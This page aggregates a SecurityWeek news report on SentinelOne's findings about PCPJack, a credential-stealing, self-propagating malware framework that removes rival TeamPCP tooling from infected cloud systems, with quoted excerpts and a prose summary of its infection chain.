"A PCPJack infection, the cybersecurity company says, begins with a Linux shell script that sets up the environment and fetches additional payloads. Before that, it searches the system for processes and artifacts matching known TeamPCP infections and removes them. Next, the script creates a Python virtual environment, downloads six modules from an AWS S3 bucket, renames them, establishes persistence, launches the first module, which serves as the main framework orchestrator, and then deletes itself."
"The remaining modules, which are imported by the orchestrator, were designed for specific purposes, including credential parsing, lateral movement, command-and-control (C&C) message encryption, cloud IP range lookups, and cloud scanning. From the local system, PCPJack can steal .env and configuration files, environment variables, SSH keys, cryptocurrency wallets, credentials, and tokens for various web apps and cloud services, including AWS, Kubernetes, Docke"
"SentinelOne has named the framework PCPJack, due to its focus on removing from the infected systems any tools and artifacts associated with TeamPCP, the hacking group behind a recent flurry of supply chain attacks targeting multiple open source software ecosystems. "Many of the services targeted by the PCPJack framework are similar to the early TeamPCP/PCPCat campaigns from December 2025, before the high-visibility campaigns of early 2026 brought significant attention to TeamPCP and purportedly led to changes in group membership. We believe this could be a former operator who is deeply familiar with the group's tooling," SentinelOne says."
"Active since late April, the campaign relies on a malware framework targeting credentials across multiple cloud environments and capable of propagating itself. A PCPJack infection begins with a Linux shell script that sets up the environment and fetches additional payloads, then removes known TeamPCP processes and artifacts before deploying additional modules."
A threat actor runs a campaign that cleans infected environments associated with TeamPCP and installs its own malicious tooling. The activity began in late April and uses a malware framework that targets credentials across multiple cloud environments while also propagating itself. The framework is named PCPJack because it removes TeamPCP tools and artifacts from compromised systems. The behavior resembles earlier TeamPCP/PCPCat activity from December 2025, suggesting the operator is familiar with the group’s tooling. Infection starts with a Linux shell script that searches for and deletes known TeamPCP processes and artifacts, then sets up a Python virtual environment, downloads modules from an AWS S3 bucket, renames them, establishes persistence, runs an orchestrator module, and deletes the script. The orchestrator imports modules for credential parsing, lateral movement, encrypted command-and-control, cloud IP lookups, and cloud scanning, enabling theft of secrets and tokens from local and cloud-related files and services.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]